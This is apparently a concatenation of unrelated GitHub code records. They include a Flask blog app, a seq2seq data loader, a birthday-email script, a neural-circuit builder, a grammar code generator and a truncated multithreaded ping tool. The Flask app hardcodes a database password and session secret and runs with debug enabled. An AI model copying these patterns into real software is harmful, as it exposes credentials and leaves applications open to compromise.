Object ID : %s\" % object_id\n\n send_to_autoai(status=status,\n csv=new_csv,\n model=model,\n label=predicted_label,\n tag=tag,\n confidence_score=round(np.max(score) * 100, 2),\n prediction=prediction,\n model_type=model_type,\n filename=file,\n imageAnnotations=\"\",\n file_type=file_type,\n prompt=None)\n","repo_name":"siddhutalluri/send_to_vm","sub_path":"autoai_utils.py","file_name":"autoai_utils.py","file_ext":"py","file_size_in_byte":7140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10039770617","text":"from flask import Flask, request, redirect, render_template, session, flash#can use bcrypt instead of hashlib\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://build-a-blog:abc123@localhost:8889/build-a-blog'\napp.config['SQLALCHEMY_ECHO'] = True\ndb = SQLAlchemy(app)\napp.secret_key = 'y337kGcys&zP3B'\n\nclass Blog(db.Model):\n\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(120))\n body = db.Column(db.String(120))\n submitted = db.Column(db.Boolean)\n \n\n def __init__(self, title, body):\n self.title = title\n self.body = body\n self.submitted = False\n\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n\n if request.method == 'POST':\n blog_name_title = request.form['blog_title']\n blog_name_body = request.form['blog_body'] \n new_blog = Blog(blog_name_title, blog_name_body) \n db.session.add(new_blog)\n db.session.commit()\n\n blogs = Blog.query.filter_by(submitted=False).all()\n submitted_blogs = Blog.query.filter_by(submitted=True).all()\n return render_template('mainBlogPage.html',title=\"Build a Blog\", blogs=blogs, submitted_blogs=submitted_blogs)\n\n@app.route('/blog', methods=['POST', 'GET'])\ndef blog():\n\n if request.method == 'POST':\n blog_name_title = request.form['blog_title']\n blog_name_body = request.form['blog_body'] \n new_blog = Blog(blog_name_title, blog_name_body) \n db.session.add(new_blog)\n db.session.commit()\n\n blogs = Blog.query.filter_by(submitted=False).all()\n submitted_blogs = Blog.query.filter_by(submitted=True).all()\n return render_template('mainBlogPage.html',title=\"Build a Blog\", blogs=blogs, submitted_blogs=submitted_blogs)\n\n@app.route('/addBlogEntry', methods=['POST', 'GET'])\ndef addBlogEntry():\n \n title_error = ''\n blog_error = ''\n blog_title = ''\n blog_body = ''\n\n if request.method == 'POST':\n blog_name_title = request.form['blog_title']\n blog_name_body = request.form['blog_body']\n if len(blog_name_title) == 0:\n title_error = 'Please enter a title'\n\n if len(blog_name_body) == 0:\n blog_error = 'Please write your blog'\n\n if not title_error and not blog_error:\n new_blog = Blog(blog_name_title, blog_name_body)\n db.session.add(new_blog)\n db.session.commit()\n return redirect('/blog') \n\n return render_template('addBlogEntry.html', title_error=title_error, blog_error=blog_error)\n\n@app.route('/newpost', methods=['POST', 'GET'])\ndef newpost():\n\n if request.method == 'POST':\n blog_id = int(request.form['blog-id-title'])\n blog = Blog.query.get(blog_id)\n blog_body = int(request.form['blog-id-body'])\n blog = Blog.query.get(blog_body) \n db.session.add(blog)\n db.session.commit()\n\n return redirect('/blog')\n\n\n@app.route('/singleblog', methods=['GET'])\ndef singleBlog():\n\n if request.args.get('id'):\n blog_id = request.args.get('id')\n print(\"Your ID is: \" + blog_id) \n blog = Blog.query.get(blog_id)\n return render_template('singleblog.html', blog=blog)\n else:\n print('no record of this post')\n\n #blogs = Blog.query.filter_by(submitted=False).all() \n\n #blog_id_title = request.args.get('blog-id-title')\n #blog_id_body = request.args.get('blog-id-body') \n\n \n\nif __name__ == '__main__':\n app.run()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ","repo_name":"jstep84/build-a-blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11741044983","text":"# encoding: utf-8\n\n\"\"\"\n 数据处理单元\n 处理原始语料数据\n 生成批训练数据\n\"\"\"\n\n\nimport re\nimport os\nimport pickle\nimport json\nimport collections\nimport itertools\nimport random\nimport numpy as np\nfrom config import data_config\n\n\nclass Vocab(object):\n def __init__(self, path):\n self.path = path\n self.word2idx, self.idx2word = self.load_vocab()\n\n self.size = len(self.word2idx)\n\n def load_vocab(self):\n word2idx = {}\n idx2word = {}\n with open(self.path, encoding='utf-8') as fvcb:\n for line in fvcb:\n w, idx = line.strip().split()\n word2idx[w] = int(idx)\n idx2word[int(idx)] = w\n\n return word2idx, idx2word\n\n def encode(self, sent):\n if isinstance(sent, list):\n sent = ''.join(sent)\n sent = sent.replace(' ', '')\n idx = [self.word2idx.get(c, 1) for c in sent]\n # if len(idx) < seq_len:\n # idx.extend([0] * (seq_len - len(idx)))\n\n return idx\n\n def decode(self, idx):\n # res = [self.idx2word.get(i, '') for i in idx]\n\n res = []\n for index in idx:\n if index <= 3:\n continue\n res.append(self.idx2word.get(index, ''))\n return ''.join(res)\n\n\nclass DataLoader(object):\n def __init__(self, path, vocab, src_len, tgt_len):\n self.path = path\n self.vcb = Vocab(vocab)\n self.src_len = src_len\n self.tgt_len = tgt_len\n\n self.vocab_size = self.vcb.size\n self.pad = self.vcb.word2idx.get('')\n self.unk = self.vcb.word2idx.get('')\n self.start = self.vcb.word2idx.get('')\n self.end = self.vcb.word2idx.get('')\n\n self.data = self.load_data()\n\n def __len__(self):\n\n return len(self.data)\n\n def transform_sentence(self, sentence):\n\n return self.vcb.encode(sentence)\n\n def transform_indexs(self, indexs):\n\n return self.vcb.decode(indexs)\n\n def load_data(self, path=None):\n if path is None:\n path = self.path\n\n data = []\n with open(path, encoding='utf-8') as fdata:\n for line in fdata:\n assert len(line.strip().split()) == 3\n\n src_tgt = line.strip().split()\n src = self.transform_sentence(src_tgt[0])[:self.src_len]\n tgt = self.transform_sentence(src_tgt[-1])[:self.tgt_len - 1]\n\n dec = [self.start] + tgt\n tgt = tgt + [self.end]\n\n s_len = len(src)\n t_len = len(tgt)\n\n if s_len < self.src_len:\n src = src + [self.pad] * (self.src_len - s_len)\n if t_len < self.tgt_len:\n tgt = tgt + [self.pad] * (self.tgt_len - t_len)\n dec = dec + [self.pad] * (self.tgt_len - t_len)\n\n data.append([src, s_len, tgt, t_len, dec])\n\n return data\n\n def next_batch(self, batch_size):\n data_batch = random.sample(self.data, batch_size)\n batch = []\n for (src, s_len, tgt, t_len, dec) in data_batch:\n batch.append((src, s_len, tgt, t_len, dec))\n batch = zip(*batch)\n batch = [np.array(x) for x in batch]\n\n return batch\n\n def eval_batch(self, batch_size):\n batch = self.data[:batch_size]\n batch = zip(*batch)\n batch = [np.array(x) for x in batch]\n\n return batch\n\n def test_data(self, path):\n data = self.load_data(path)\n batch = []\n for (src, s_len, tgt, t_len, dec) in data:\n batch.append([np.array([src]),\n np.array([s_len]),\n np.array([tgt]),\n np.array([t_len]),\n np.array([dec])])\n\n return batch\n\n\nclass DataUnit(object):\n\n # 特殊标签\n PAD = ''\n UNK = ''\n START = ''\n END = ''\n\n # 特殊标签的索引\n START_INDEX = 0\n END_INDEX = 1\n UNK_INDEX = 2\n PAD_INDEX = 3\n\n def __init__(self, path, processed_path,\n min_q_len, max_q_len,\n min_a_len, max_a_len,\n word2index_path):\n \"\"\"\n 初始化函数,参数意义可查看CONFIG.py文件中的注释\n :param\n \"\"\"\n self.path = path\n self.processed_path = processed_path\n self.word2index_path = word2index_path\n self.min_q_len = min_q_len\n self.max_q_len = max_q_len\n self.min_a_len = min_a_len\n self.max_a_len = max_a_len\n self.vocab_size = 0\n self.index2word = {}\n self.word2index = {}\n self.data = self.load_data()\n self._fit_data_()\n\n def next_batch(self, batch_size):\n \"\"\"\n 生成一批训练数据\n :param batch_size: 每一批数据的样本数\n :return: 经过了填充处理的QA对\n \"\"\"\n data_batch = random.sample(self.data, batch_size)\n batch = []\n for qa in data_batch:\n encoded_q = self.transform_sentence(qa[0])[:self.max_q_len]\n encoded_a = self.transform_sentence(qa[1])[:self.max_a_len]\n q_len = len(encoded_q)\n\n # 填充句子\n encoded_q = encoded_q + \\\n [self.func_word2index(self.PAD)] * (self.max_q_len - q_len)\n encoded_a = encoded_a + [self.func_word2index(self.END)]\n encoded_a = encoded_a[:self.max_a_len]\n a_len = len(encoded_a)\n encoded_a = encoded_a + \\\n [self.func_word2index(self.PAD)] * (self.max_a_len - a_len)\n\n batch.append((encoded_q, q_len, encoded_a, a_len))\n batch = zip(*batch)\n batch = [np.asarray(x) for x in batch]\n return batch\n\n def transform_sentence(self, sentence):\n \"\"\"\n 将句子转化为索引\n :param sentence:\n :return:\n \"\"\"\n res = []\n for word in sentence:\n res.append(self.func_word2index(word))\n return res\n\n def transform_indexs(self, indexs):\n \"\"\"\n 将索引转化为句子,同时去除填充的标签\n :param indexs:索引序列\n :return:\n \"\"\"\n res = []\n for index in indexs:\n if (index == self.START_INDEX or index == self.PAD_INDEX\n or index == self.END_INDEX or index == self.UNK_INDEX):\n continue\n res.append(self.func_index2word(index))\n return ''.join(res)\n\n def _fit_data_(self):\n \"\"\"\n 得到处���后语料库的所有词,并将其编码为索引值\n :return:\n \"\"\"\n if not os.path.exists(self.word2index_path):\n vocabularies = [x[0] + x[1] for x in self.data]\n self._fit_word_(itertools.chain(*vocabularies))\n with open(self.word2index_path, 'wb') as fw:\n pickle.dump(self.word2index, fw)\n else:\n with open(self.word2index_path, 'rb') as fr:\n self.word2index = pickle.load(fr)\n self.index2word = dict([(v, k)\n for k, v in self.word2index.items()])\n self.vocab_size = len(self.word2index)\n\n def load_data(self):\n \"\"\"\n 获取处理后的语料库\n :return:\n \"\"\"\n if not os.path.exists(self.processed_path):\n data = self._extract_txt()\n with open(self.processed_path, 'wb') as fw:\n pickle.dump(data, fw)\n else:\n with open(self.processed_path, 'rb') as fr:\n data = pickle.load(fr)\n # 根据CONFIG文件中配置的最大值和最小值问答对长度来进行数据过滤\n data = [\n x for x in data if self.min_q_len <= len(\n x[0]) <= self.max_a_len and self.min_a_len <= len(\n x[1]) <= self.max_a_len]\n return data\n\n def func_word2index(self, word):\n \"\"\"\n 将词转化为索引\n :param word:\n :return:\n \"\"\"\n return self.word2index.get(word, self.word2index[self.UNK])\n\n def func_index2word(self, index):\n \"\"\"\n 将索引转化为词\n :param index:\n :return:\n \"\"\"\n return self.index2word.get(index, self.UNK)\n\n def _fit_word_(self, vocabularies):\n \"\"\"\n 将词表中所有的词转化为索引,过滤掉出现次数少于4次的词\n :param vocabularies:词表\n :return:\n \"\"\"\n vocab_counter = collections.Counter(vocabularies)\n index2word = ([self.START] + [self.END] + [self.UNK] + [self.PAD] +\n [x[0] for x in vocab_counter if vocab_counter.get(x[0]) > 4])\n self.word2index = dict([(w, i) for i, w in enumerate(index2word)])\n self.index2word = dict([(i, w) for i, w in enumerate(index2word)])\n\n def _regular_(self, sen):\n \"\"\"\n 句子规范化,主要是对原始语料的句子进行一些标点符号的统一\n :param sen:\n :return:\n \"\"\"\n sen = sen.replace('/', '')\n sen = re.sub(r'…{1,100}', '…', sen)\n sen = re.sub(r'\\.{3,100}', '…', sen)\n sen = re.sub(r'···{2,100}', '…', sen)\n sen = re.sub(r',{1,100}', ',', sen)\n sen = re.sub(r'\\.{1,100}', '。', sen)\n sen = re.sub(r'。{1,100}', '。', sen)\n sen = re.sub(r'\\?{1,100}', '?', sen)\n sen = re.sub(r'?{1,100}', '?', sen)\n sen = re.sub(r'!{1,100}', '!', sen)\n sen = re.sub(r'!{1,100}', '!', sen)\n sen = re.sub(r'~{1,100}', '~', sen)\n sen = re.sub(r'~{1,100}', '~', sen)\n sen = re.sub(r'[“”]{1,100}', '\"', sen)\n sen = re.sub(r'[^\\w\\u4e00-\\u9fff\"。,?!~·]+', '', sen)\n sen = re.sub(r'[ˇˊˋˍεπのゞェーω]', '', sen)\n\n return sen\n\n def _good_line_(self, line):\n \"\"\"\n 判断一句话是否是好的语料,即判断\n :param line:\n :return:\n \"\"\"\n if len(line) == 0:\n return False\n ch_count = 0\n for c in line:\n # 中文字符范围\n if '\\u4e00' <= c <= '\\u9fff':\n ch_count += 1\n if ch_count / float(len(line)) >= 0.5 and len(re.findall(r'[a-zA-Z0-9]', ''.join(line))) < 3 and len(\n re.findall(r'[ˇˊˋˍεπのゞェーω]', ''.join(line))) < 3 and line.find(\"鸡\") == -1:\n return True\n return False\n\n def _extract_data(self):\n res = []\n q = None\n with open(self.path, 'r', encoding='utf-8') as fr:\n for line in fr:\n if line.startswith('M '):\n if q is None:\n q = self._regular_(line[2:-1])\n else:\n a = self._regular_(line[2:-1])\n if self._good_line_(q) and self._good_line_(a):\n res.append((q, a))\n q = None\n return res\n\n def _extract_txt(self):\n res = []\n q = None\n with open(self.path, 'r', encoding='utf-8') as fr:\n for line in fr:\n qa = line.split('\\t')\n if len(qa) < 2:\n continue\n q = self._regular_(qa[0])\n a = self._regular_(qa[1])\n if self._good_line_(q) and self._good_line_(a):\n res.append((q, a))\n return res\n\n def __len__(self):\n \"\"\"\n 返回处理后的语料库中问答对的数量\n :return:\n \"\"\"\n return len(self.data)\n\n def normalize_txt(self):\n # normalize original txt data\n if not os.path.exists(self.processed_path):\n data = self._extract_txt()\n with open(self.processed_path, 'wb') as fw:\n pickle.dump(data, fw)\n # normalize vocabulary\n if not os.path.exists(self.word2index_path):\n vocabularies = [x[0] + x[1] for x in data]\n self._fit_word_(itertools.chain(*vocabularies))\n with open(self.word2index_path, 'wb') as fw:\n pickle.dump(self.word2index, fw)\n\n\nif __name__ == '__main__':\n data_unit = DataUnit(\n path=data_config['path'], processed_path=data_config['processed_path'],\n min_q_len=data_config['min_q_len'], max_q_len=data_config['max_q_len'],\n min_a_len=data_config['min_a_len'], max_a_len=data_config['max_a_len'],\n word2index_path=data_config['word2index_path'])\n data_unit.normalize_txt()\n","repo_name":"kpsc/nlp","sub_path":"SEQ2SEQ/base-v1/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":12597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4789097815","text":"\"\"\"\nA script that sends a randomly chosen, customized birthday message to contacts listed in birthdays.csv\n\"\"\"\nimport smtplib\nimport datetime as dt\nimport config # Import secret login information, stored separately to keep it out of git/github\nimport random\nimport pandas as pd\n\n\ndef send_email(to_address, subject, message):\n \"\"\"\n Sends an email message with gmail using the account info provided in config.py\n\n :param to_address: email address of the recipient\n :param subject: subject of email\n :param message: message to send\n :return: None\n \"\"\"\n\n with smtplib.SMTP(\"smtp.gmail.com\", port=587) as connection:\n connection.starttls()\n connection.login(user=config.my_email, password=config.password)\n connection.sendmail(\n from_addr=config.my_email,\n to_addrs=to_address,\n msg=f\"Subject: {subject}\\n\\n{message}\"\n )\n\n\n# Get the current date\nnow = dt.datetime.now()\n\nbirthdays_df = pd.read_csv(\"birthdays.csv\") # Read in birthdays from birthdays.csv file\n\n# Create a new dataframe containing birthdays that match today's month and day\ntodays_birthdays_df = birthdays_df[(birthdays_df.month == now.month) & (birthdays_df.day == now.day)]\n\n# Iterate through the dataframe of matching birthdays then customize and send a randomly chosen message for each\nfor index, row in todays_birthdays_df.iterrows():\n with open(f\"letter_templates/letter_{random.choice([1, 2, 3])}.txt\") as letter_file:\n custom_message = letter_file.read()\n\n custom_message = custom_message.replace(\"[NAME]\", row['name'])\n custom_message = custom_message.replace(\"[FROM]\", config.my_name)\n print(f\"Sending message to {row['name']} - {row['email']}\")\n send_email(to_address=row['email'], subject='Happy Birthday', message=custom_message)\n","repo_name":"jasonwashburn/BirthdayWisher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17528889396","text":"import cluster_mode_backend as cmb\nimport k8s_config\n\n# check what clusters we can access\nk8s_config.update_available_clusters()\nclusters = k8s_config.all_cluster_names()\n\n# list deployment names for each namespace in each cluster\nfor cluster in clusters:\n\tprint(\"Cluster\", cluster + \":\")\n\tnamespaces = cmb.cluster_namespaces(cluster)\n\tfor ns in namespaces:\n\t\tprint(\"\\tNamespace\", ns.metadata.name + \":\")\n\t\tdeploys = cmb.namespace_deployments(ns.metadata.name, cluster)\n\t\tfor deploy in deploys:\n\t\t\tprint(\"\\t\\tDeployment:\", deploy.metadata.name)\n\n# getting cluster objects from mcm\nprint(cmb.mcm_clusters(clusters))\n","repo_name":"IBM/multicloud-incident-response-navigator","sub_path":"backend/cluster_mode_backend_example.py","file_name":"cluster_mode_backend_example.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"74864156413","text":"import os\nimport json\nimport h5py\nimport numpy as np\n\n\nfrom allensdk.api.queries.cell_types_api import CellTypesApi\n\nfrom bmtk.builder import NetworkBuilder\nfrom bmtk.builder.bionet import SWCReader\nfrom bmtk.builder.auxi.node_params import positions_columinar, xiter_random\n\nimport urllib.request\nimport yaml\nfrom yaml.loader import Loader\nimport pandas as pd\nimport numpy as np\n\n# models to use from DataFrame\nflag = 'AA' # 'TEST', 'AA', 'PS', or 'ALL'\nnum_models = 2 # if 'TEST' specify number of all-active models\n\nnp.random.seed(0)\n\nwith open('model_data/models.yaml') as f:\n models = yaml.load(f, Loader=Loader)\n\nwith open('model_data/specimens.yaml') as f:\n specimens = yaml.load(f, Loader=Loader)\n\nboth_df = pd.read_pickle('both_models_df')\nboth_AA_ids = list(both_df['all-active model id'].values)\nboth_PS_ids = list(both_df['perisomatic model id'].values)\n\nmorphology_files = {}\n\naa_cell_models = []\nps_cell_models = []\n\ncell_types_api = CellTypesApi()\n\nif flag in 'TEST':\n test_rows = both_df.iloc[:num_models, :]\n models_df = test_rows\nelse:\n models_df = both_df\n\nfor row in models_df.iterrows():\n row_items = row[1]\n specimen_id = row_items['specimen id']\n all_active_id = row_items['all-active model id']\n perisomatic_id = row_items['perisomatic model id']\n\n specimen = specimens[specimen_id]\n aa_model = specimen['all-active']\n ps_model = specimen['perisomatic']\n\n morphology_file = f\"{aa_model['cre_lines']}_{aa_model['neuron_reconstruction_id']}_m\"\n\n if not os.path.exists(f\"morphologies/{morphology_file}.swc\"):\n cell_types_api.save_reconstruction(int(specimen_id), f\"morphologies/{morphology_file}.swc\")\n\n if flag in ('TEST', 'AA', 'ALL'):\n aa_model_name = f\"{aa_model['id']}_all-active\"\n aa_model_template = f\"nml:Cell_{aa_model['id']}.cell.nml\"\n aa_cell_model = {'model_name': aa_model_name,\n 'ei': 'i',\n 'morphology': morphology_file,\n 'model_template': aa_model_template}\n aa_cell_models.append(aa_cell_model)\n\n if flag in ('PS', 'ALL'):\n ps_model_name = f\"{ps_model['id']}_perisomatic\"\n ps_model_template = f\"nml:Cell_{ps_model['id']}.cell.nml\"\n ps_cell_model = {'model_name': ps_model_name,\n 'ei': 'i',\n 'morphology': morphology_file,\n 'model_template': ps_model_template}\n ps_cell_models.append(ps_cell_model)\n\ncell_models = aa_cell_models + ps_cell_models\n\nmorphologies = {p['model_name']: SWCReader(f\"morphologies/{p['morphology']}.swc\") for p in cell_models}\n\nwith open(\"circuit_config.json\", \"r\") as jsonFile:\n cir_cfg_data = json.load(jsonFile)\n\nif flag in 'TEST':\n single_cells = NetworkBuilder(f'single_cells_{num_models}')\n cir_cfg_data['networks']['nodes'] = [{'nodes_file': f'$NETWORK_DIR/single_cells_{num_models}_nodes.h5',\n 'node_types_file': f'$NETWORK_DIR/single_cells_{num_models}_node_types.csv'}]\n print('BUILT TEST NETWORK!')\nelif flag in 'AA':\n single_cells = NetworkBuilder('single_cells_aa')\n cir_cfg_data['networks']['nodes'] = [{'nodes_file': '$NETWORK_DIR/single_cells_aa_nodes.h5',\n 'node_types_file': '$NETWORK_DIR/single_cells_aa_node_types.csv'}]\n print('BUILT ALL-ACTIVE NETWORK!')\nelif flag in 'PS':\n single_cells = NetworkBuilder('single_cells_ps')\n cir_cfg_data['networks']['nodes'] = [{'nodes_file': '$NETWORK_DIR/single_cells_ps_nodes.h5',\n 'node_types_file': '$NETWORK_DIR/single_cells_ps_node_types.csv'}]\n print('BUILT PERISOMATIC NETWORK!')\nelse:\n single_cells = NetworkBuilder('single_cells_all')\n cir_cfg_data['networks']['nodes'] = [{'nodes_file': '$NETWORK_DIR/single_cells_all_nodes.h5',\n 'node_types_file': '$NETWORK_DIR/single_cells_all_node_types.csv'}]\n print('BUILT ALL NETWORK!')\n\nwith open(\"circuit_config.json\", \"w\") as jsonFile:\n json.dump(cir_cfg_data, jsonFile, indent=4)\n\nfor i, model_props in enumerate(cell_models):\n n_cells = 1\n\n positions = positions_columinar(N=n_cells, center=[0, 10.0, 0], max_radius=50.0, height=200.0)\n\n single_cells.add_nodes(N=n_cells,\n x=positions[:, 0], y=positions[:, 1], z=positions[:, 2],\n rotation_angle_yaxis=xiter_random(N=n_cells, min_x=0.0, max_x=2*np.pi),\n model_type='biophysical',\n model_processing='aibs_perisomatic',\n **model_props)\n\nsingle_cells.build()\nsingle_cells.save(output_dir='network')\n","repo_name":"kedoxey/AIBS_single_cell_network","sub_path":"build_network.py","file_name":"build_network.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14956859344","text":"def write_visitor_info(write_file, all_expr_class_infos):\n write_file.write(\"class {0}:\\n\".format(base_visitor_class_name))\n write_file.write(\"{0}def accept(self, obj):\\n\".format(indent))\n write_file.write(\"{0}visitor_class_name = obj.__class__.__name__.lower()\\n\".format(indent*2))\n write_file.write(\"{0}method_name = 'visit_' + visitor_class_name\\n\".format(indent*2))\n write_file.write(\"{0}func_to_call = getattr(self, method_name)\\n\".format(indent*2))\n write_file.write(\"{0}return func_to_call(obj)\\n\".format(indent*2))\n write_file.write('\\n')\n\n write_file.write(\"# Implementation for these visitor classes / functions defined elsewhere\\n\")\n for visitor_type in visitor_types:\n write_file.write(\"class {0}:\\n\".format(visitor_type))\n for expr_class_name, field_arr in all_expr_class_infos.items():\n write_file.write(\"{0}def visit_{1}(self, {2}_obj):\\n\".format(\n indent, expr_class_name.lower(), expr_class_name.lower()))\n write_file.write(\"{0}pass\\n\".format(indent*2))\n write_file.write('\\n')\n\n\ndef write_header_info(write_file, all_expr_class_infos, base_class_name):\n write_file.write(\"# {0} Types:\\n\".format(base_class_name))\n write_file.write(\"# {0}{1}\\n\".format(indent, ', '.join(all_expr_class_infos.keys())))\n write_file.write(\"# \\n\")\n write_file.write(\"# Visitors (accepts) avaliable on types:\\n\")\n write_file.write(\"# {0}{1}\\n\\n\".format(indent, ', '.join(visitor_types)))\n\n\ndef write_base_class(write_file, base_class_name):\n write_file.write(\"class {0}:\\n\".format(base_class_name))\n write_file.write(\"{0}def accept(self, visitor_obj):\\n\".format(indent))\n write_file.write(\"{0}visitor_obj.visit(self)\\n\".format(indent*2))\n write_file.write('\\n')\n\n\ndef read_line_from_grammar(write_file, line):\n colon_split = line.split(':')\n if len(colon_split) != 2:\n if line.rstrip().lstrip() != '':\n print('Could not parse line in grammar', line)\n return None\n\n class_name = colon_split[0].replace(' ', '')\n read_obj = {class_name: []}\n\n # reading fields\n fields = colon_split[1].split(',')\n for field in fields:\n var_type, var_name = field.lstrip().rstrip().split(' ')\n read_obj[class_name].append((var_type, var_name))\n return read_obj\n\n\ndef write_classes(write_file, all_expr_class_infos, base_class_name):\n for expr_class_name, expr_class_fields in all_expr_class_infos.items():\n # Set-up for class\n write_file.write(\"class {0}({1}):\\n\".format(expr_class_name, base_class_name))\n write_file.write(\"{0}def __init__({1}):\\n\".format(\n indent, ', '.join(\n ['self'] + [var_name for var_type, var_name in expr_class_fields])))\n\n # Writing fields of __init__()\n for field in expr_class_fields:\n (var_type, var_name) = field\n write_file.write(\"{0}self.{1} = {2} # type: {3}\\n\".format(\n indent * 2, var_name, var_name, var_type)) \n write_file.write('\\n')\n\n\nbase_expression_class_name = 'Expression'\nexpression_grammar_definition = [\n 'Assignment : Token name, Expr right',\n 'Binary : Expr left, Token operator, Expr right',\n 'Grouping : Expr expression',\n 'Call : Expr callee, Token paren, List arguments',\n 'Literal : Object value',\n 'Unary : Token operator, Expr right',\n 'Variable : Token token_obj',\n]\nexpression_grammar = (base_expression_class_name, expression_grammar_definition)\n\n\nbase_statement_class_name = 'Statement'\nstatement_grammar_definition = [\n 'Block : List statements',\n 'Expression : Expr expression',\n 'Function : Token token_obj, List param_token_objs, List body',\n 'If : Expr condition, Statement then_branch, Statement else_branch',\n 'Print : Expr expression',\n 'Return : Expr expression',\n 'Var : Token token_obj, Expr initializer',\n 'While : Expr condition, Statement then_branch',\n]\nstatement_grammar = (base_statement_class_name, statement_grammar_definition)\n\n\nall_grammars = [expression_grammar, statement_grammar]\nfor base_class_name, grammar_definition in all_grammars:\n # setup stuff for grammar\n grammer_class_filename_write = '{0}_output.py'.format(base_class_name.lower())\n indent = ' ' * 4\n base_visitor_class_name = 'Visitor'\n visitor_types = [\n 'Evaluate{0}'.format(base_class_name), \n 'Stringify{0}'.format(base_class_name), \n # 'Stringify{0}RPN'.format(base_class_name)\n ]\n # writing the actual class\n with open(grammer_class_filename_write, 'w') as write_file:\n all_expr_class_infos = {}\n for line in grammar_definition:\n expr_class_info = read_line_from_grammar(write_file, line)\n if expr_class_info:\n all_expr_class_infos.update(expr_class_info)\n print(all_expr_class_infos)\n if 'END GRAMMAR' in line:\n break\n\n # header\n write_header_info(write_file, all_expr_class_infos, base_class_name)\n \n # writing expr info\n write_base_class(write_file, base_class_name)\n\n # writing expr info\n write_classes(write_file, all_expr_class_infos, base_class_name)\n\n # visitor info\n write_visitor_info(write_file, all_expr_class_infos)\n\n # reads file, strips all trailing newlines and stores in temp string\n with open(grammer_class_filename_write, 'r') as write_file:\n new_str = write_file.read().rstrip('\\n')\n\n # overwrites file with tempstring\n with open(grammer_class_filename_write, 'w') as write_file:\n write_file.write(new_str)\n\n print('Created \"{0}\" file using {1} grammar'.format(\n grammer_class_filename_write, grammar_definition))","repo_name":"aduerig/JLox","sub_path":"Tool_CreateGrammarClasses.py","file_name":"Tool_CreateGrammarClasses.py","file_ext":"py","file_size_in_byte":5822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16063600601","text":"\"\"\"mpts - Multithreaded Ping Two Subnets (designed for two CIDR/24 subnets)\n\nThis script concurrently pings (in multithreaded mode) two separate CIDR/24\nsubnets (called CIDR1/24 and CIDR2/24) and outputs:\n 1. All ping results\n 2. If all success:\n \"Both CIDR1/24 and CIDR2/24 are fully responding to ping requests.\n No failures.\"\n 3. If any failures:\n a. IP addresses in CIDR1/24 that failed ping\n b. IP addresses in CIDR2/24 that failed ping\n c. Final octets of failed ping requests in CIDR1/24 but not CIDR2/24\n d. Final octets of failed ping requests in CIDR2/24 but not CIDR1/24\n e. Final octets of failed ping requests in both CIDR1/24 and CIDR2/24\n\"\"\"\n\nfrom subprocess import Popen\nfrom subprocess import PIPE\nfrom threading import Thread\nimport ipaddress\nimport queue\nimport sys\nimport getopt\n\n\ndef initiate_ping_queues(cidr1, cidr2, skip):\n \"\"\"Initiates the multithreaded ping queues\n\n Parameters\n ----------\n cidr1 : str\n The CIDR1/24 subnet (e.g., \"192.168.1.0/24\")\n cidr2 : str\n The CIDR2/24 subnet (e.g., \"192.168.2.0/24\")\n skip : str\n A skipped octet, if any\n\n Returns\n -------\n result : list\n \"\"\"\n num_threads = 20\n ips_q1, ips_q2 = queue.Queue(), queue.Queue()\n ips1, ips2 = [], []\n failed_ips1, failed_ips2 = [], []\n\n for ip in ipaddress.IPv4Network(cidr1):\n ip_str = str(ip)\n octets = ip_str.split(\".\")\n final_octet = int(octets[3])\n if final_octet == 0 or final_octet == skip:\n continue # disregard 0 (broadcast) octet or skipped octet\n ips1.append((final_octet, ip_str))\n\n for ip in ipaddress.IPv4Network(cidr2):\n ip_str = str(ip)\n octets = ip_str.split(\".\")\n final_octet = int(octets[3])\n if final_octet == 0 or final_octet == skip:\n continue # disregard 0 (broadcast) octet or skipped octet\n ips2.append((final_octet, ip_str))\n\n # start the queue1 thread pool\n for i in range(num_threads):\n worker = Thread(target=ping_thread, args=(i, ips_q1, failed_ips1))\n worker.setDaemon(True)\n worker.start()\n\n # fill queue1\n for ip in ips1:\n ips_q1.put(ip)\n\n # start the queue2 thread pool\n for i in range(num_threads):\n worker = Thread(target=ping_thread, args=(i, ips_q2, failed_ips2))\n worker.setDaemon(True)\n worker.start()\n\n # fill queue2\n for ip in ips2:\n ips_q2.put(ip)\n\n # wait until queue1 worker threads are done to exit\n ips_q1.join()\n\n # wait until queue2 worker threads are done to exit\n ips_q2.join()\n\n result = print_results(cidr1, failed_ips1, cidr2, failed_ips2)\n return result\n\n\ndef ping_thread(i, q, faillist):\n \"\"\"Single ping thread\n\n Parameters\n ----------\n i : int\n thread id\n q : queue.Queue()\n multithreaded ping queue\n faillist : list\n List containing tuples of failed CIDR/24 IP addresses.\n Each tuple contains the final octet and the IP address.\n\n Returns\n -------\n None.\n \"\"\"\n while True:\n ip = q.get()\n attempt = 1\n while attempt < 4:\n with Popen(['ping', '-c', '1', '-W', '1', ip[1]], stdout=PIPE) \\\n as response:\n result = response.wait()\n # print the ping output if desired\n # print(response.communicate()[0])\n return_code = get_returncode(ip, response)\n if return_code == 0:\n print(ip[1], 'is up')\n break\n elif return_code != 0 and attempt == 3:\n print(ip[1], 'is down')\n faillist.append(ip)\n break\n else:\n print(ip[1], f\"failed ping - attempt {attempt}\")\n attempt += 1\n q.task_done()\n\n\ndef get_returncode(ip, response):\n 